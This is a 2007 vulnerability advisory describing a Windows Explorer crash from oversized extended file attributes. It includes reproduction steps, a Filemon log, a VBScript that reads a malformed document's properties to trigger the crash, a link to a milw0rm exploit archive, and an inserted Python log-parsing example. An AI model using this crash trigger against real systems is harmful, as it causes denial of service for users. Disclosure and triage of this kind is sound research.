(Adobe informed on 27-05-2007 via web form, and confirmed:
http://www.adobe.com/misc/securityform.html)

Multiple other programs are affected.

After a simple study of the malformed Word document exploit/vulns
I have a small observation: I think this vuln could be reproduced
in some other programs, not only in Word apps.

After monitoring Explorer and some DLLs I think this is only
the tip of the iceberg. The overflow happens when Explorer
calls the kernel module KERNEL32, which makes system calls through
ntdll.dll to manage the information of any file.

In the functions GetFileAttributesExW and GetFileAttributesW
(KERNEL32) and in the undocumented functions NtQueryInformationFile,
NtQueryDirectoryFile and NtSetInformationFile in ntdll.dll.

Those functions obtain the extended file attributes; if the information
is too long, in the subfunctions FileAllInformation() and FileNameInformation()
and others (look in FILE_INFORMATION_CLASS) we obtain a buffer overflow,
and some other subfunctions can produce the same error.

Windows shows the extended file attributes in multiple parts of the system:
when viewing a folder, when hovering the mouse over a file or a folder.

Other applications use the same files to do the same :)

#######################
2-Explanation
#######################

Extended file attributes is a file system feature that enables users to
associate computer files with metadata not interpreted by the filesystem,
whereas regular attributes have a purpose strictly defined by the filesystem
(such as permissions or records of creation and modification times). Unlike
forks, which can usually be as large as the maximum file size, extended
attributes are usually limited in size to a value significantly smaller than
the maximum file size. Typical uses can be storing the author of a document,
the character encoding of a plain-text document, or a checksum.




A local buffer overflow exists in Windows Explorer.
The extended file attribute functions have a small buffer size in 'FileAllInformation(), FileNameInformation()' and other subfunctions of the
undocumented functions of NTDLL, resulting in a buffer overflow with
an unknown impact.



These are the buffer sizes of the related functions
and the main function involved:

FileAllInformation
// 18 FILE_ALL_INFORMATION 0x68 NtQueryInformationFile

FileNameInformation
// 9 FILE_NAME_INFORMATION 0x08 NtQueryInformationFile

Other functions may be vulnerable too;
look at this table:

http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/File/FILE_INFORMATION_CLASS.html


When we hover over a file, explorer.exe reads the extended
file attributes and shows this information in a 'bubble'; when
opening a folder, Explorer obtains the directory listing, file
names and other information about the files.

How to locate the overflow?

1- create a new txt file, for example explorer.txt
2- right-click on the file and open Properties
3- in all of the boxes (author, title, subject, and especially
in the comment text area) write many A's, for example, or more:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


4- use Filemon http://www.microsoft.com/technet/
sysinternals/FileAndDisk/Filemon.mspx

and include the process explorer.exe

5- click on the txt Properties and click Accept or Apply.

6- go to Filemon and look at the log for explorer.exe; you will have something
similar to this:


21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Options: Create Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER OVERFLOW FileFsAttributeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Position: 0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Length: 0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Length: 0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER OVERFLOW FileAllInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA FILE NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER OVERFLOW FileAllInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Options: OverwriteIf Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA BUFFER OVERFLOW FileFsAttributeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position: 0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length: 0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length: 0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position: 88
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length: 88
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length: 88
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER OVERFLOW FileAllInformation
21:24:00.046 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position: 30996
21:24:00.046 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation

the overflow is done :)

Afterwards you can hover over the file and Explorer shows the extended file attributes,
and sometimes Filemon marks the overflow again.
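When reading a Filemon capture like the one above, the first triage step is to separate the Result column from the crash itself. Filemon shows the NTSTATUS the file system returned, rendered as text: "BUFFER OVERFLOW" is STATUS_BUFFER_OVERFLOW (0x80000005), the warning status a query returns when the caller's output buffer is smaller than the answer and the data was truncated, which is also the normal "ask again with a bigger buffer" signal for NtQueryInformationFile and friends. Counting which operations and information classes produce it, on which streams, tells you where to look before deciding whether any memory is actually being corrupted. The Python script below is an added example, not part of the advisory or of Filemon; it parses records in the layout shown above (the field order and result words are assumed from that log) and summarises them. The four sample records are reconstructed from the log in this post, one record per line.

```python
import re
from collections import Counter
from typing import Optional

# Four records reconstructed from the post's Filemon log (one record per line;
# the post wraps each across two or three lines). The space before
# "SummaryInformation" is how Filemon renders the non-printable byte that
# starts that NTFS stream name.
SAMPLE_LOG = [
    r"21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE NOT FOUND Options: Open Access: All",
    r"21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER OVERFLOW FileFsAttributeInformation",
    r"21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER OVERFLOW FileAllInformation",
    r"21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position: 88",
]

# Result words seen in this log. "BUFFER OVERFLOW" is STATUS_BUFFER_OVERFLOW
# (0x80000005): a warning status, the answer was truncated to the caller's
# buffer; it is not by itself evidence that anything was written out of bounds.
RESULTS = ("SUCCESS", "BUFFER OVERFLOW", "FILE NOT FOUND")

# Assumed record layout, taken from the log above:
# time  process:pid  IRP major function  path  result  [detail]
RECORD_RE = re.compile(
    r"^(?P<time>\d\d:\d\d:\d\d\.\d+)\s+"
    r"(?P<process>\S+?):(?P<pid>\d+)\s+"
    r"(?P<op>IRP_MJ_\w+)\s+"
    r"(?P<path>.+?)\s+"
    r"(?P<result>" + "|".join(RESULTS) + r")"
    r"(?:\s+(?P<detail>.*))?$"
)


def parse_record(line: str) -> Optional[dict]:
    """One Filemon line -> dict of fields, or None if it is not a record."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["pid"] = int(rec["pid"])
    rec["detail"] = rec["detail"] or ""
    return rec


def parse_log(lines) -> list:
    """Parse every line, silently skipping prose or blank lines."""
    return [r for r in (parse_record(line) for line in lines) if r]


def stream_name(path: str) -> str:
    """The NTFS alternate data stream part of the path (after the last '\\:')."""
    idx = path.rfind("\\:")
    return path[idx + 1:] if idx >= 0 else ""


def overflow_summary(records: list) -> Counter:
    """Count BUFFER OVERFLOW results by (IRP major function, information class)."""
    return Counter(
        (r["op"], r["detail"]) for r in records if r["result"] == "BUFFER OVERFLOW"
    )


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for (op, info_class), n in overflow_summary(recs).items():
        print(f"{n} x {op} {info_class}")
    for r in recs:
        print(r["op"], stream_name(r["path"]), r["result"], r["detail"])
```

Run over the full log in the post, the summary is four IRP_MJ_QUERY_INFORMATION / FileAllInformation hits and two IRP_MJ_QUERY_VOLUME_INFORMATION / FileFsAttributeInformation hits, all on the SummaryInformation property-set streams of the test file. The next step in a triage is to pair those with what the process actually did afterwards (a retry with a larger buffer, or the crash), which this capture alone does not show.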


###################
3-Versions tested
###################

I only tested with:

Microsoft Windows XP Home Edition, all fixes as of 17/05/2007
Explorer.exe 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)

###################
4-Solution
###################

Wait for an update or patch

####################
5-Timeline:
####################

Discovered:12-03-2007
Vendor notify:19-03-2007
Vendor response:22-03-2007
Private disclosure:17-05-2007
Public disclosure:04-06-2007

######################
6-Response from vendor
######################

Thank you for checking up on this case, We have concluded
our investigations on this matter and have found this crash
to be un-exploitable. This vulnerability is very similar to
another milworm posting (http://www.milw0rm.com/exploits/3419).
As we have not been able to find an exploitable angle for
this issue this crash will get tracking into the next available
Service Pack fix.

#####################
7- Test
#####################

1 download this exploit:
http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar
and uncompress it in c:\test, or edit in EFA_test.vbs the correct
path where you put the malformed doc file.

2 copy EFA_test.vbs and edit the correct path to the file.

3 execute EFA_test.vbs

The script looks for the extended file attributes
of the malformed doc file, and when it tries to read
the "author" attribute Windows Scripting Host
crashes.

Other overflows could be triggered in all the boxes of
the file properties.
The application crashes because we use a VBS script to
look at the malformed doc file;
if any other application tries to look at the malformed
doc file it crashes too.

This is a simple test using an existing exploit for
Microsoft ole32.dll, but the overflow is deeper:
it is in ntdll.dll, because ntdll.dll is the library that uses
NtQueryInformationFile to obtain the extended file attributes.

That is why this overflow can be
triggered in any file type with malformed extended file attributes.



########################################
8-related vulns and documentations
########################################

########################
EFA_test.vbs
########################

' EFA_test.vbs: list the extended file attributes (Explorer's "Details"
' columns) of every file in C:\test through the Shell.Application object.
Dim arrHeaders(35)
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace("C:\test")   ' edit to the folder holding the malformed doc
' Column headers (Name, Size, Type, ..., Author, Title, Comments, ...)
For i = 0 to 34
arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i)
Next
' Read every column of every file; reading the malformed document's
' attributes is what makes Windows Scripting Host crash.
For Each strFileName in objFolder.Items
For i = 0 to 34
Wscript.Echo i & vbtab & arrHeaders(i) _
& ": " & objFolder.GetDetailsOf(strFileName, i)
Next
Next



###################
RELATED VULNS :
###################

http://secunia.com/advisories/10020/

http://secunia.com/advisories/10194/

http://osvdb.org/displayvuln.php?osvdb_id=31885

http://osvdb.org/displayvuln.php?osvdb_id=31886

http://osvdb.org/displayvuln.php?osvdb_id=31887

###################
Related Exploit
###################

http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar

#################
Related Microsoft
security bulletin
#################

http://www.microsoft.com/technet/security/advisory/933052.mspx

##################
RElated functions
##################

extended file attributes
http://en.wikipedia.org/wiki/Extended_file_attributes

GetExtFileProperties()
http://www.kixtart.org/forums/ubbthreads.php?ubb=showflat&Number=160880&page=1

File information class:
http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/
NT%20Objects/File/FILE_INFORMATION_CLASS.html

possible source code of ntdll
http://www.cybertech.net/~sh0ksh0k/projects/old/win32toolkit/ntdll.c
http://www.cybertech.net/~sh0ksh0k/projects/old/win32toolkit/ntdll.h
http://source.winehq.org/source/dlls/ntdll/file.c
the links to ntdll.c and ntdll.h apparently are dead; you can try
to search for them in Google's cache, sorry for the inconvenience

###############################€nd#########################

Thnx to estrella for being my light
Thnx to FalconDeOro; he investigated and documented this issue with me.
Thnx to Icaro and the Badchecksum Team for their interest in the research.
Thnx to Jkouns and Jericho for their patience.
Thnx to all OSVDB manglers; they are involved in a very nice project.
Thnx to the Secunia Research Team; they do very good co-work with researchers.
They put in my hands all that I needed in this and other research.
Thnx to all Lostmon's Group Team
Thnx to Microsoft for the responses.

